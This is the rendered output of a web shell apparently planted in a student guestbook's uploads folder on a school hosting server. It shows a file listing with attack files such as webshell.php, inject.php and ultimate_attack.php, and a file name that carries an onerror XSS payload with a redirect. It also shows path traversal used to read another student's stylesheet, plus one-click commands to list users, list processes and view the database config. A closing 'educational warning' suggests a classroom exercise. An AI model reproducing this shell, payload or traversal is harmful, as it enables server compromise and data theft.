🐚 WEB SHELL ACTIVATED

📁 File Browser

Current directory: /home/klas4s23/domains/585455.klas4s23.mid-ica.nl/public_html/Gastenboek/uploads

📄 ' onerror='alert(`Gehacked door Jasper!`);window.location.replace(`..`)'.png [view]
📁 ..
📄 003b15869ae62d2ceeee451a5f652dd6.png [view]
📄 0tk5j14v024b1.jpg [view]
📄 300px-Cursed_Cat.jpg [view]
📄 32640-afbeelding-1__ScaleMaxWidthWzYwMF0_CompressedW10.jpg [view]
📄 Bill-Gates-Paul-Allen-2013.jpg [view]
📄 CV Jasper Kramp.png [view]
📄 Cat profile.png [view]
📄 Fronalpstock_big.jpg [view]
📄 Krik en las.jpg [view]
📄 Krik.jpg [view]
📄 Pino-dood-03.jpg [view]
📄 Shellz.php [view]
📄 Ted_Kaczynski_2_(cropped).jpg [view]
📄 Tux.svg.png [view]
📄 Z.png [view]
📄 android.jpg [view]
📄 apple.php [view]
📄 cianancatfish.jpg [view]
📄 downloads (1).jpeg [view]
📄 downloads.jpeg [view]
📄 epresso.jpg [view]
📄 fake_photo.png [view]
📄 hand.jpg [view]
📄 https___dynaimage.cdn.cnn.com_cnn_x_156,y_210,w_1209,h_1612,c_crop_https2F2F5bae1c384db3d70020c01c40%2FfireflyWolfy.jpg [view]
📄 image.png [view]
📄 images.jpeg [view]
📄 info.php [view]
📄 inject.php [view]
📄 instant_redirect.jpg [view]
📄 japper.jpg [view]
📄 koekiemonster-3.jpg [view]
📄 logo.png [view]
📄 muis.jpg [view]
📄 people-call-woman-ugly-responds-with-more-selfies-melissa-blake-1-5d75f249a418b__700.jpg [view]
📄 picobellobv.jpeg [view]
📄 redirect.php [view]
📄 rupsje-nooitgenoeg-knuffel-pluche-42-cm-500x500.jpg [view]
📄 sdfsa.png [view]
📄 sneaky.svg [view]
📄 taylor.webp [view]
📄 test.html [view]
📄 testpreg.php [view]
📄 testpreg1.php [view]
📄 testtest.php.JPG [view]
📄 ultimate_attack.gif [view]
📄 ultimate_attack.php [view]
📄 ultimate_attack.svg [view]
📄 wallpaper.jpg [view]
📄 webshell.php [view]

📄 Viewing: ./../../../../567358.klas4s23.mid-ica.nl/public_html/Gastenboek/test.css

.Container {
    display: flex;
    justify-content: center;
    align-items: center;
    margin-top: 3rem;
    position: relative;

  }

.messages-container{

  display: flex;
  flex-wrap: wrap;
  flex-direction: row;
  justify-content: center;
  
}
   
  .sendContainer {
    width: 400px;
    height: 400px;
    border: 2px solid #1256d4;
    border-radius: 12px;
    background-color: whitesmoke;
    display: grid;
    grid-template-columns: 1fr 1fr 1fr;
    grid-template-rows: 1fr 1fr;
    grid-auto-columns: 1fr;
    gap: 0px 0px;
    grid-auto-flow: row;
    grid-template-areas:
      "nameBox nameBox nameBox"
      "message message message";
  }
   
  .nameBox {
    grid-area: nameBox;
    display: flex;
    flex-direction: row;
    justify-content: space-around;
    align-items: center;
    height: 135%;
  }
   
  .message {
    grid-area: message;
    display: flex;
    /* justify-content: center; */
    /* align-items: center; */
    background-color: #fcfafab6;
    border-radius: 15px; /* Hiermee stel je de afronding van de randen in */
    border: 5px solid #0056b3; /* Dit zorgt voor een rand om de kaart */
    padding: 10px;
    width: max-content;
    height: 247px;
    margin: 2rem;
    flex-direction: column; /* Stapel de berichten verticaal op */
    box-shadow: 0 4px 11px rgba(255, 0, 0, 0.1); /* Hier voeg je de drop shadow toe */
  
}
   
  html,
  body,
  .container {
    height: 100%;
    margin: 0;
  }
   
  .messageTitle {
    position: absolute;
    left: 26%;
    top: 5%;
    color: #514216;
  }
   
  input {
    background-color: whitesmoke;
    border: 2px solid #9da9ab;
    border-radius: 8px;
    text-align: center;
    width: 39%;
    height: 23%;
  }
   
  input[type="submit"] {
    width: 100%;
    height: 160%;
    position: relative;
    left: 100%;
    top: -226%;
    cursor: pointer;
  }

  .home-button {
    display: inline-block; /* Zorgt ervoor dat de knop inline wordt weergegeven */
    font-size: 16px; /* Grootte van de tekst */
    text-decoration: none; /* Verwijder onderstreping van de link */
    background-color: #007bff; /* Achtergrondkleur van de knop */
    color: #fff; /* Tekstkleur */
    border-radius: 5px; /* Afgeronde hoeken */
    border-width: 5px;
    border-color: black;
    border-style: solid;
    border-radius: 5px;
    width: 150px;
    
  }
  
  /* Verander de achtergrondkleur bij hover */
  .home-button:hover {
    background-color: #0056b3;
  }

  .banner{

    position: absolute;
    border-width: 5px;
    border-color: black;
    border-style: solid;
    border-radius: 15px;
    margin-left: 550px;
    margin-top: 20px;
    width: 400px;
    height: 120px;
    text-align: center;
    background-color: #fff;
  }

.homebtn {
  background: transparent;
}

p{
  font-size: 1rem;
  font-weight: bold;
  font-family: Arial, Helvetica, sans-serif;
}

.home{

  margin-left: 25px;
  font-weight: lighter;
  font-size: small;
}

img {
  width: 100px; /* Pas deze waarde aan naar de gewenste breedte */
  height: auto; /* Hiermee wordt de hoogte automatisch geschaald om de aspect ratio te behouden */
  padding: 10px;
  border-radius: 15px;
  margin-left: 674px;
  margin-top: -93px;
}

.bericht{
  grid-area: message;
  gap: 10%;
  display: flex;
  flex-direction: row;
  justify-content: center;
  align-items: center;
}

.title{
  margin-top: 40px;
  font-size: 2rem;
  font-weight: bold;
  font-family: Arial, Helvetica, sans-serif;
}

.video-container {
  position: fixed;
  top: 0;
  left: 0;
  width: 100%;
  height: 100%;
  z-index: -1; 
}

.video-container video {
  object-fit: cover;
  width: 100%;
  height: 100%;
}

.formpie {
  display: flex;
  align-items: center;
  justify-content: center;
  margin-right: 25px;
} 

.kleur{
  font-weight: bolder;
  color: #0056b3;
}

  
.banner1{
  padding: 20px;
  position: absolute;
  border-width: 5px;
  border-color: black;
  border-style: solid;
  margin-left: 527px;
  width: 400px;
  margin-top: 150px;
  height: 120px;
  text-align: center;
  background-color: #fff;
  border-radius: 15px; /* Hiermee stel je de afronding van de randen in */
}

.session{
  margin-top: 20px;
  font-size: 1.5rem;
  font-weight: bold;
  font-family: Arial, Helvetica, sans-serif;
}

.knop {
  padding: 10px 20px; /* Ruimte binnen de knop */
  font-size: 16px; /* Grootte van de tekst */
  border: 10px color(black); /* Geen rand */
  background-color: #fff; /* Achtergrondkleur van de knop */
  color: black; /* Tekstkleur */
  border-radius: 5px; /* Afgeronde hoeken */
  cursor: pointer; /* Verander de cursor in een handje bij hover */
  margin-top: 500px;
  margin-left: 600px;
}

/* Verander de achtergrondkleur bij hover */
.knop:hover {
  background-color: #0056b3;
}

.knop1 {
  padding: 10px 20px; /* Ruimte binnen de knop */
  font-size: 16px; /* Grootte van de tekst */
  background-color: #fff; /* Achtergrondkleur van de knop */
  color: black; /* Tekstkleur */
  border-radius: 5px; /* Afgeronde hoeken */
  cursor: pointer; /* Verander de cursor in een handje bij hover */
}

/* Verander de achtergrondkleur bij hover */
.knop1:hover {
  background-color: #0056b3;
}

.tijd{

  margin-left: 655px;
  margin-top: auto;
 
}


.home1{
  width: 100px; /* Pas deze waarde aan naar de gewenste breedte */
  height: auto; /* Hiermee wordt de hoogte automatisch geschaald om de aspect ratio te behouden */
  padding: 10px;
  border-radius: 15px;
  margin-left: 0px;
  margin-top: 0px;
}

.label{
  font-weight: bold;
  margin-left: 20px;
  border-radius: 15px;
}

 input[type="file"] {
  display: none;
}


@media screen and (max-width: 320px) {  
  .message {
    width: 250px;
    height: 250px;
    padding: 20px;
  }

  .container {
    display: flex;
    flex-wrap: wrap;
    justify-content: center;
  }

  .messages-container{
    display: flex;
    flex-wrap: wrap;
    justify-content: center;
  }

  .tijd{
    margin-left: 0px;
  }

  img {
    width: 100px; /* Pas deze waarde aan naar de gewenste breedte */
    height: auto; /* Hiermee wordt de hoogte automatisch geschaald om de aspect ratio te behouden */
    padding: 10px;
    border-radius: 15px;
    margin-left: 141px;
    margin-top: -93px;
  }

  .banner{
    display: flex;
    flex-wrap: wrap;
    justify-content: center;
    margin-left: 175px;
  }

  .knop1 {

  }
}

🎯 Available Actions

Command Execution:

Quick Commands:

📋 List files | 👤 Show user | 📍 Show directory | 🔄 Show processes | 🔐 Show users

File Operations:

⬆️ Parent directory | 🏠 Root directory | 🔍 View DB config
⚠️ Educational Warning: This demonstrates a web shell vulnerability. In a real attack, this could allow complete server compromise!